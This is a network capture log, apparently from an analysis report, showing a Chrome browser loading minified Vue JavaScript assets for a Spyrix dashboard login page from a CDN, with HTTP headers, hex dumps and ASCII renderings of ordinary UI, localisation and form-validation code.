                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 613
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-265"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:13:07+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc30
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC613INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 70 2c 63 20 61 73 20 72 2c 61 20 61 73 20 65 2c 6f 20 61 73 20 74 2c 62 20 61 73 20 63 2c 74 20 61 73 20 75 2c 6e 20 61 73 20 6c 2c 65 20 61 73 20 66 2c 55 20 61 73 20 64 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 6b 3d 70 28 7b 5f 5f 6e 61 6d 65 3a 22 54 65 78 74 22 2c 70 72 6f 70 73 3a 7b 6f 6e 65 52 6f 77 3a 7b 74 79 70 65 3a 42 6f 6f 6c 65 61 6e 2c 64 65 66 61 75 6c 74 3a 21 31 7d 2c 62 6f 6c 64 3a 7b 74 79 70 65 3a 42 6f 6f 6c 65 61 6e 2c 64 65 66 61 75 6c 74 3a 21 31 7d 2c 74 65 78 74 3a 7b 7d 2c 73 69 7a 65 3a 7b 64 65 66 61 75 6c 74 3a 22 73 6d 22 7d 2c 63 6f 6c 6f 72 3a 7b 64 65 66 61 75 6c 74 3a 22 64 65 66 61 75 6c 74 22 7d 2c 75 70 70 65 72 63 61 73 65
                                                                                                                                                                                                                                                          Data Ascii: import{d as p,c as r,a as e,o as t,b as c,t as u,n as l,e as f,U as d}from"./index-004f4025.js";const k=p({__name:"Text",props:{oneRow:{type:Boolean,default:!1},bold:{type:Boolean,default:!1},text:{},size:{default:"sm"},color:{default:"default"},uppercase


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          41192.168.2.75505495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC376OUTGET /dashboard30/assets/en-ef960fb7.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 774
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-306"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC774INData Raw: 63 6f 6e 73 74 20 65 3d 22 52 65 67 69 73 74 65 72 22 2c 6f 3d 22 45 6d 61 69 6c 22 2c 74 3d 22 50 61 73 73 77 6f 72 64 22 2c 73 3d 22 4c 6f 67 69 6e 22 2c 61 3d 7b 22 57 65 6c 63 6f 6d 65 20 42 61 63 6b 22 3a 22 57 65 6c 63 6f 6d 65 20 42 61 63 6b 22 2c 22 53 69 67 6e 20 49 6e 20 77 69 74 68 20 45 6d 61 69 6c 22 3a 22 53 69 67 6e 20 49 6e 20 77 69 74 68 20 45 6d 61 69 6c 22 2c 22 4e 6f 20 61 63 63 6f 75 6e 74 3f 22 3a 22 4e 6f 20 61 63 63 6f 75 6e 74 3f 22 2c 52 65 67 69 73 74 65 72 3a 65 2c 45 6d 61 69 6c 3a 6f 2c 50 61 73 73 77 6f 72 64 3a 74 2c 4c 6f 67 69 6e 3a 73 2c 22 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 22 3a 22 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 22 2c 22 54 68 69 73 20 65 6d 61 69 6c 20 63 61 6e 6e 6f 74 20 62 65 20 75 73
                                                                                                                                                                                                                                                          Data Ascii: const e="Register",o="Email",t="Password",s="Login",a={"Welcome Back":"Welcome Back","Sign In with Email":"Sign In with Email","No account?":"No account?",Register:e,Email:o,Password:t,Login:s,"Forgot password?":"Forgot password?","This email cannot be us


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          42192.168.2.75505095.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC398OUTGET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 4589
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-11ed"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:21:08+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc11
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC3765INData Raw: 69 6d 70 6f 72 74 7b 4a 20 61 73 20 54 2c 24 20 61 73 20 4c 2c 46 20 61 73 20 79 2c 61 47 20 61 73 20 5f 2c 45 20 61 73 20 77 2c 61 4d 20 61 73 20 62 2c 61 41 20 61 73 20 52 2c 63 20 61 73 20 43 2c 70 20 61 73 20 46 2c 61 74 20 61 73 20 63 2c 52 20 61 73 20 4d 2c 61 76 20 61 73 20 66 2c 61 75 20 61 73 20 53 2c 61 77 20 61 73 20 75 2c 61 78 20 61 73 20 68 2c 61 63 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 66 75 6e 63 74 69 6f 6e 20 6c 74 28 29 7b 76 61 72 20 70 3b 63 6f 6e 73 74 20 74 3d 54 28 29 2c 65 3d 4c 28 29 2c 72 3d 79 28 29 2c 61 3d 5f 28 29 2c 7b 73 65 74 44 65 66 61 75 6c 74 73 3a 6f 7d 3d 77 28 29 2c 73 3d 28 28 70 3d 72 2e 70 72 6f 67 72 61 6d 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 70
                                                                                                                                                                                                                                                          Data Ascii: import{J as T,$ as L,F as y,aG as _,E as w,aM as b,aA as R,c as C,p as F,at as c,R as M,av as f,au as S,aw as u,ax as h,ac as N}from"./index-004f4025.js";function lt(){var p;const t=T(),e=L(),r=y(),a=_(),{setDefaults:o}=w(),s=((p=r.program)==null?void 0:p
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC824INData Raw: 7d 2c 63 68 65 63 6b 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 3a 7b 2e 2e 2e 75 7d 7d 29 2c 67 65 74 74 65 72 73 3a 7b 66 65 74 63 68 53 74 61 74 65 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 65 74 63 68 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 73 74 61 74 65 7d 2c 66 65 74 63 68 45 72 72 6f 72 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 66 65 74 63 68 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 65 72 72 6f 72 7d 2c 63 68 65 63 6b 53 74 61 74 65 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 63 68 65 63 6b 50 68 6f 6e 65 43 61 6c 6c 53 74 61 74 75 73 2e 73 74 61 74 65 7d 7d 2c 61 63 74 69 6f 6e 73 3a 7b 61 73 79 6e 63 20 66 65 74 63 68 56 65 72 69 66 69 63 61 74 69 6f 6e 50 68 6f 6e 65 28 74 29 7b 63 6f 6e 73 74 20 65 3d 45 28 74 29 3b 61 77 61 69 74 20
                                                                                                                                                                                                                                                          Data Ascii: },checkPhoneCallStatus:{...u}}),getters:{fetchState(t){return t.fetchPhoneCallStatus.state},fetchError(t){return t.fetchPhoneCallStatus.error},checkState(t){return t.checkPhoneCallStatus.state}},actions:{async fetchVerificationPhone(t){const e=E(t);await


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          43192.168.2.75505295.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC376OUTGET /dashboard30/assets/en-5393c481.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 1098
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-44a"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T22:51:29+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc33
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC1098INData Raw: 63 6f 6e 73 74 20 6f 3d 22 63 6f 6e 76 65 6e 69 65 6e 74 22 2c 65 3d 22 4d 61 69 6e 22 2c 6e 3d 7b 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 6c 69 63 65 6e 73 65 20 70 65 72 69 6f 64 20 68 61 73 20 65 78 70 69 72 65 64 22 2c 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 3a 22 54 68 65 20 74 72 69 61 6c 20 70 65 72 69 6f 64 20 69 73 20 65 78 70 69 72 65 64 22 2c 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 3a 22 59 6f 75 72 20 64 61 74 61 20 69 73 20 73 61 66 65 22 2c 22 50 6c 65 61 73 65 20 70 75 72 63 68 61 73 65 20 61 20 6c 69 63 65 6e 73 65 20 74 6f 20 61 63 63 65 73 73 20 79 6f 75 72 20 64 61 74 61 22 3a 22 50 6c 65 61 73 65 20
                                                                                                                                                                                                                                                          Data Ascii: const o="convenient",e="Main",n={"The license period has expired":"The license period has expired","The trial period is expired":"The trial period is expired","Your data is safe":"Your data is safe","Please purchase a license to access your data":"Please


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          44192.168.2.75505395.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:29 UTC379OUTGET /dashboard30/assets/index-1178777c.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 5163
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-142b"
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:02:54+00:00
                                                                                                                                                                                                                                                          X-Node: m9p-up-gc69
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC3764INData Raw: 69 6d 70 6f 72 74 7b 64 20 61 73 20 46 2c 6f 20 61 73 20 49 2c 62 20 61 73 20 44 2c 69 20 61 73 20 50 2c 72 20 61 73 20 67 74 2c 6e 20 61 73 20 72 2c 75 20 61 73 20 74 2c 61 75 20 61 73 20 70 74 2c 67 20 61 73 20 48 2c 45 20 61 73 20 5f 74 2c 46 20 61 73 20 66 74 2c 24 20 61 73 20 76 74 2c 44 20 61 73 20 45 74 2c 4d 20 61 73 20 75 2c 63 20 61 73 20 77 2c 70 20 61 73 20 78 2c 52 20 61 73 20 79 2c 73 20 61 73 20 68 74 2c 61 74 20 61 73 20 77 74 2c 68 20 61 73 20 73 2c 79 20 61 73 20 64 2c 61 7a 20 61 73 20 78 74 2c 61 6d 20 61 73 20 79 74 2c 65 20 61 73 20 53 74 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 61 20 61 73 20 57 2c 75 20 61 73 20 4c 74 2c 62 20 61 73 20 50 74 2c 64 20 61 73 20 42 74 7d 66
                                                                                                                                                                                                                                                          Data Ascii: import{d as F,o as I,b as D,i as P,r as gt,n as r,u as t,au as pt,g as H,E as _t,F as ft,$ as vt,D as Et,M as u,c as w,p as x,R as y,s as ht,at as wt,h as s,y as d,az as xt,am as yt,e as St}from"./index-004f4025.js";import{a as W,u as Lt,b as Pt,d as Bt}f
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC1399INData Raw: 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 66 6f 72 6d 22 2c 6f 6e 4b 65 79 70 72 65 73 73 3a 78 74 28 47 2c 5b 22 65 6e 74 65 72 22 5d 29 7d 2c 5b 73 28 71 2c 7b 63 6c 61 73 73 3a 72 28 5b 74 28 69 29 2e 69 6e 70 75 74 5d 29 2c 76 61 6c 75 65 3a 74 28 67 29 2c 76 61 72 69 61 6e 74 3a 72 74 2e 76 61 6c 75 65 2c 22 61 64 64 69 74 69 6f 6e 61 6c 2d 6d 65 73 73 61 67 65 22 3a 74 28 52 29 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 74 28 61 29 28 22 45 6d 61 69 6c 22 29 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 65 6d 61 69 6c 22 2c 6f 6e 4f 6e 43 68 61 6e 67 65 3a 51 7d 2c 6e 75 6c 6c 2c 38 2c 5b 22 63 6c 61 73 73 22 2c 22 76 61 6c 75 65 22 2c 22 76 61 72 69 61 6e 74 22 2c 22 61 64 64 69 74 69 6f 6e 61 6c 2d 6d 65 73 73 61 67 65 22 2c 22 70 6c 61 63 65 68
                                                                                                                                                                                                                                                          Data Ascii: "data-testid":"form",onKeypress:xt(G,["enter"])},[s(q,{class:r([t(i).input]),value:t(g),variant:rt.value,"additional-message":t(R),placeholder:t(a)("Email"),"data-testid":"email",onOnChange:Q},null,8,["class","value","variant","additional-message","placeh


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          45192.168.2.75505795.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC387OUTGET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 629
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-275"
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T21:10:27+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc231
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC629INData Raw: 63 6f 6e 73 74 20 65 3d 22 67 31 6a 44 45 4e 75 51 22 2c 6f 3d 22 6b 6e 33 2d 6a 70 61 38 22 2c 64 3d 22 70 69 31 61 53 67 71 4e 22 2c 72 3d 22 59 78 32 6d 49 6a 4e 35 22 2c 6e 3d 22 47 51 54 58 6e 50 56 68 22 2c 73 3d 22 53 70 74 36 4f 6f 39 41 22 2c 63 3d 22 52 6d 44 6c 44 74 50 31 22 2c 74 3d 22 6e 4c 49 47 57 42 32 6b 22 2c 6c 3d 22 49 65 50 78 6f 4f 71 53 22 2c 69 3d 22 41 55 6d 76 4e 54 7a 36 22 2c 61 3d 22 5f 36 76 58 51 70 6d 51 44 22 2c 6d 3d 22 71 33 56 30 32 46 68 36 22 2c 62 3d 22 53 4a 30 47 50 63 38 65 22 2c 79 3d 22 5f 35 56 65 61 78 45 64 39 22 2c 70 3d 22 63 4b 66 79 68 4a 71 2d 22 2c 68 3d 22 47 77 2d 6c 36 37 79 4d 22 2c 75 3d 22 58 6a 4a 4d 4f 6a 4b 46 22 2c 78 3d 22 57 5a 68 5a 2d 5a 4b 4c 22 2c 50 3d 22 65 49 48 36 65 73 68 57 22 2c
                                                                                                                                                                                                                                                          Data Ascii: const e="g1jDENuQ",o="kn3-jpa8",d="pi1aSgqN",r="Yx2mIjN5",n="GQTXnPVh",s="Spt6Oo9A",c="RmDlDtP1",t="nLIGWB2k",l="IePxoOqS",i="AUmvNTz6",a="_6vXQpmQD",m="q3V02Fh6",b="SJ0GPc8e",y="_5VeaxEd9",p="cKfyhJq-",h="Gw-l67yM",u="XjJMOjKF",x="WZhZ-ZKL",P="eIH6eshW",


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          46192.168.2.75505695.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC595OUTGET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 796
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-31c"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: HIT
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T04:13:37+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc82
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC796INData Raw: 69 6d 70 6f 72 74 7b 64 2c 67 20 61 73 20 63 2c 63 20 61 73 20 73 2c 6f 20 61 73 20 66 2c 62 20 61 73 20 6d 2c 68 20 61 73 20 70 2c 6e 2c 75 20 61 73 20 61 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 5f 20 61 73 20 78 7d 66 72 6f 6d 22 2e 2f 54 65 78 74 2e 76 75 65 5f 76 75 65 5f 74 79 70 65 5f 73 63 72 69 70 74 5f 73 65 74 75 70 5f 74 72 75 65 5f 6c 61 6e 67 2d 61 36 36 34 35 34 32 64 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 6f 7d 66 72 6f 6d 22 2e 2f 42 75 74 74 6f 6e 54 65 78 74 2e 6d 6f 64 75 6c 65 2d 63 37 36 39 62 39 61 65 2e 6a 73 22 3b 63 6f 6e 73 74 20 62 3d 64 28 7b 5f 5f 6e 61 6d 65 3a 22 42 75 74 74 6f 6e 54 65 78 74 22 2c 70 72 6f 70 73 3a 7b 77 68 69 74 65 53 70 61 63 65 3a
                                                                                                                                                                                                                                                          Data Ascii: import{d,g as c,c as s,o as f,b as m,h as p,n,u as a}from"./index-004f4025.js";import{_ as x}from"./Text.vue_vue_type_script_setup_true_lang-a664542d.js";import{c as o}from"./ButtonText.module-c769b9ae.js";const b=d({__name:"ButtonText",props:{whiteSpace:


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          47192.168.2.75506095.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC562OUTGET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC390INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:30 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 838
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: "66fa817d-346"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T21:43:33+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc90
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:28:30 UTC838INData Raw: 69 6d 70 6f 72 74 7b 61 63 20 61 73 20 6e 2c 6d 20 61 73 20 69 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 30 30 34 66 34 30 32 35 2e 6a 73 22 3b 63 6f 6e 73 74 20 64 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 74 7d 3d 6e 3b 72 65 74 75 72 6e 20 65 2e 69 6e 63 6c 75 64 65 73 28 22 40 22 29 26 26 65 2e 69 6e 63 6c 75 64 65 73 28 22 2e 22 29 3f 22 22 3a 74 28 22 50 6c 65 61 73 65 20 65 6e 74 65 72 20 61 20 76 61 6c 69 64 20 65 2d 6d 61 69 6c 20 61 64 64 72 65 73 73 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 63 6f 6e 73 74 7b 74 7d 3d 6e 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3c 3d 31 38 30 3f 22 22 3a 74 28 22 54 68 65 20 66 69 65 6c 64 20 6d 75 73 74 20 63 6f 6e 74 61 69 6e 20 6c 65 73 73 20 74 68 61 6e 20 31 38 30 20 63 68 61 72 61 63 74 65 72 73
